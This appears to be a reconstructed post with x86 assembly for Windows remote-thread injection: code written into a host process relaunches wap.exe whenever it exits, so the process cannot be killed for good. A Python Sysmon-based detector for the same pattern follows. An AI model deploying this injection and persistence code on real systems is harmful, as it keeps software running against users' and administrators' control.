This program uses the publicly documented Win2k remote-thread injection technique to keep a specified process running at all times. Assemble it as wap.exe, copy it to c:\ and run it; from then on the wap process cannot be killed for good, because a thread injected into a host process relaunches it whenever it exits.

How it works: the injector resolves OpenProcess, WaitForSingleObject and WinExec from kernel32 and stores their addresses in dword slots embedded inside ProtectkProc, copies ProtectkProc together with the FileName string into memory allocated in the host with VirtualAllocEx, and starts it with CreateRemoteThread, passing its own process ID as the thread argument. Inside the host, the remote thread opens the protector by that ID, blocks in WaitForSingleObject until the protector exits, then relaunches c:\wap.exe with WinExec. Two caveats: the injector needs PROCESS_ALL_ACCESS on the host, so it only works against processes the caller could open anyway (same user, or SeDebugPrivilege), and the protection ends as soon as the host or the injected thread is killed first. The remote thread's start address lies in private memory rather than in any loaded module, which is exactly the pattern remote-thread-creation telemetry flags.

The listing as it appears on the page lost its commas, quotes and digits; the numeric constants marked as assumed below are reconstructed, and the window class the original used to locate the host is not on the page.

        include Win.inc                 ; the include name lost its punctuation on the page; use the Win32 include shipped with your assembler
        .386
        .model flat, stdcall

        .data
; ProtectkProc lives in .data on purpose: the injector patches the three dword
; slots embedded in it at run time, which would fault in a read-only .code
; section. It must be position independent, since it runs at whatever address
; VirtualAllocEx returns inside the host, so every address is derived from a
; call/pop pair.
ProtectkProc proc ProcID: dword
        call GetKnlOpenProcess          ; pushes the address of the slot below
KnlOpenProcess dd ?                     ; filled in by the injector before the copy
GetKnlOpenProcess:
        pop eax
        ; SYNCHRONIZE would be enough to wait on the process; the original asks for everything
        call [eax], PROCESS_ALL_ACCESS, FALSE, ProcID
        or eax, eax
        jz short ExitProtectProc
        mov ebx, eax                    ; handle to the protected process
        call GetKnlWaitForSingleObject
KnlWaitForSingleObject dd ?
GetKnlWaitForSingleObject:
        pop eax
        call [eax], ebx, INFINITE       ; block until the protected process exits (timeout lost on the page; INFINITE assumed)
        call GetFileNameAddress         ; locate FileName relative to the current address
GetFileNameAddress:
        pop ecx
        add ecx, offset FileName - offset GetFileNameAddress
        call GetKnlWinExec
KnlWinExec dd ?
GetKnlWinExec:
        pop eax
        call [eax], ecx, SW_SHOWNORMAL  ; relaunch c:\wap.exe (uCmdShow lost on the page; SW_SHOWNORMAL assumed)
ExitProtectProc:
        ret
ProtectkProc endp

FileName            db 'c:\wap.exe', 0   ; must directly follow the proc: it is copied into the host with it
ProtectkProcEnd     label byte           ; end of the region copied into the host
KnlOpenProcessStr   db 'OpenProcess', 0
KnlWaitForObjectStr db 'WaitForSingleObject', 0
KnlWinExecStr       db 'WinExec', 0
Kernel32Str         db 'kernel32.dll', 0
TargetClass         db 'Progman', 0      ; placeholder: the window class the original used is not on the page

        .code
        extrn GetModuleHandleA: proc
        extrn GetProcAddress: proc
        extrn OpenProcess: proc
        extrn FindWindowA: proc
        extrn GetWindowThreadProcessId: proc
        extrn VirtualAllocEx: proc
        extrn VirtualFreeEx: proc
        extrn WriteProcessMemory: proc
        extrn GetCurrentProcessId: proc
        extrn CreateRemoteThread: proc
        extrn GetExitCodeThread: proc
        extrn CloseHandle: proc
        extrn WinExec: proc
        extrn MessageBoxA: proc
        extrn Sleep: proc
        extrn ExitProcess: proc

Start:
        ; Resolve the three exports the remote thread will call. kernel32 is
        ; mapped at the same base in every process of a session, so addresses
        ; resolved here are valid in the host. The page hard-coded a Win2k
        ; kernel32 base (digits lost); GetModuleHandleA works on any version.
        call GetModuleHandleA, offset Kernel32Str
        mov esi, eax
        call GetProcAddress, esi, offset KnlOpenProcessStr
        mov KnlOpenProcess, eax
        call GetProcAddress, esi, offset KnlWaitForObjectStr
        mov KnlWaitForSingleObject, eax
        call GetProcAddress, esi, offset KnlWinExecStr
        mov KnlWinExec, eax

        ; Find the host process through one of its windows and open it
        call FindWindowA, offset TargetClass, NULL
        or eax, eax
        jz OpenProcessError
        push eax                        ; scratch dword: receives the PID, later bytes written / thread id / exit code
        call GetWindowThreadProcessId, eax, esp
        mov edx, [esp]
        call OpenProcess, PROCESS_ALL_ACCESS, FALSE, edx
        or eax, eax
        jz OpenProcessError
        mov ebx, eax                    ; handle to the host process

        ; Copy ProtectkProc and FileName into executable memory in the host
        call VirtualAllocEx, ebx, NULL, offset ProtectkProcEnd - offset ProtectkProc, MEM_COMMIT, PAGE_EXECUTE_READWRITE
        or eax, eax
        jz OpenProcessError
        mov edi, eax                    ; remote base of the copied code
        call WriteProcessMemory, ebx, edi, offset ProtectkProc, offset ProtectkProcEnd - offset ProtectkProc, esp

        ; Start it in the host with our own PID as the thread argument
        call GetCurrentProcessId
        call CreateRemoteThread, ebx, NULL, NULL, edi, eax, NULL, esp
        call GetExitCodeThread, eax, esp    ; normally STILL_ACTIVE at this point; kept from the original
        pop eax
        ; The remote memory is deliberately left mapped: the watchdog thread runs in it
        ;call VirtualFreeEx, ebx, edi, 0, MEM_RELEASE
        call CloseHandle, ebx
        call Sleep, 1000                    ; delay lost on the page; 1000 ms assumed
        call MessageBoxA, NULL, offset FileName, offset FileName, MB_OK
OpenProcessError:
        call ExitProcess, 0             ; the original returned from the entry point with the scratch dword still pushed
        end Start
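The defensive counterpart to this technique, as an added example that is not part of the original post: the injector opens the host with PROCESS_ALL_ACCESS, writes code into freshly allocated memory and starts a thread there, so in process-access and remote-thread telemetry the new thread's start address falls outside every loaded module and is preceded by a handle grant carrying CREATE_THREAD, VM_OPERATION and VM_WRITE. The detector below runs that correlation over Sysmon-style records (Event ID 10 ProcessAccess, Event ID 8 CreateRemoteThread field names); the sample records are constructed, not captured from a real host.

```python
"""Flag CreateRemoteThread-style injection in Sysmon-like process telemetry.

Added example for the injection pattern above (OpenProcess with
PROCESS_ALL_ACCESS, VirtualAllocEx, WriteProcessMemory, CreateRemoteThread);
it is not part of the original post. Record fields follow Sysmon Event ID 10
(ProcessAccess) and Event ID 8 (CreateRemoteThread). All sample records are
constructed, not captured from a real host.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Process access rights from winnt.h
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
# PROCESS_ALL_ACCESS differs by OS: 0x1F0FFF up to XP/2003, 0x1FFFFF from Vista on
PROCESS_ALL_ACCESS_VALUES = {0x1F0FFF, 0x1FFFFF}
# The minimum a process needs to write code into another process and start it
INJECT_RIGHTS = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE


@dataclass
class Finding:
    source_image: str
    target_image: str
    start_address: str
    granted_access: Optional[int]
    reasons: List[str] = field(default_factory=list)


def detect_remote_thread_injection(events: List[Dict]) -> List[Finding]:
    """Return one Finding per suspicious cross-process thread creation.

    A remote thread is reported when its start address is not backed by a
    loaded image (code was written into private memory, as VirtualAllocEx plus
    WriteProcessMemory does) or when the source process had earlier opened the
    target with rights sufficient for injection.
    """
    access_seen: Dict[Tuple[int, int], int] = {}  # (src pid, dst pid) -> union of granted masks
    findings: List[Finding] = []
    for ev in events:
        key = (ev["SourceProcessId"], ev["TargetProcessId"])
        if ev["EventID"] == 10:
            access_seen[key] = access_seen.get(key, 0) | int(ev["GrantedAccess"], 16)
            continue
        if ev["EventID"] != 8 or key[0] == key[1]:
            continue  # not a thread creation, or a thread created in the caller itself
        reasons = []
        if ev.get("StartModule", "") in ("", "-"):
            reasons.append("start address not inside any loaded module")
        mask = access_seen.get(key)
        if mask is not None:
            if mask & INJECT_RIGHTS == INJECT_RIGHTS:
                reasons.append("source earlier obtained CREATE_THREAD|VM_OPERATION|VM_WRITE on target")
            if mask in PROCESS_ALL_ACCESS_VALUES:
                reasons.append("handle was opened with PROCESS_ALL_ACCESS")
        if reasons:
            findings.append(Finding(ev["SourceImage"], ev["TargetImage"],
                                    ev["StartAddress"], mask, reasons))
    return findings


# Constructed sample telemetry (not real captures)
SAMPLE_EVENTS = [
    # the protector opens explorer.exe with PROCESS_ALL_ACCESS (Win2k value)
    {"EventID": 10, "SourceProcessId": 1204, "SourceImage": r"C:\wap.exe",
     "TargetProcessId": 588, "TargetImage": r"C:\WINNT\explorer.exe",
     "GrantedAccess": "0x1F0FFF"},
    # its remote thread starts in the memory VirtualAllocEx returned, outside any module
    {"EventID": 8, "SourceProcessId": 1204, "SourceImage": r"C:\wap.exe",
     "TargetProcessId": 588, "TargetImage": r"C:\WINNT\explorer.exe",
     "NewThreadId": 1320, "StartAddress": "0x00410000", "StartModule": "", "StartFunction": ""},
    # a benign remote thread whose start address lies inside ntdll.dll
    {"EventID": 8, "SourceProcessId": 404, "SourceImage": r"C:\WINNT\system32\csrss.exe",
     "TargetProcessId": 588, "TargetImage": r"C:\WINNT\explorer.exe",
     "NewThreadId": 1340, "StartAddress": "0x77F8B2A0",
     "StartModule": r"C:\WINNT\system32\ntdll.dll", "StartFunction": "RtlUserThreadStart"},
    # a debugger opens a handle with full access but never creates a thread
    {"EventID": 10, "SourceProcessId": 900, "SourceImage": r"C:\Tools\dbg.exe",
     "TargetProcessId": 1204, "TargetImage": r"C:\wap.exe", "GrantedAccess": "0x1FFFFF"},
]


if __name__ == "__main__":
    for f in detect_remote_thread_injection(SAMPLE_EVENTS):
        print(f"{f.source_image} -> {f.target_image} @ {f.start_address}")
        for r in f.reasons:
            print("   ", r)
```

Only the wap.exe record is reported: the csrss.exe thread starts inside ntdll.dll and has no preceding handle grant from that source, and the debugger's full-access handle never leads to a thread creation. An unbacked start address on its own is a strong signal for this technique, because the watchdog code only ever exists in memory the injector allocated.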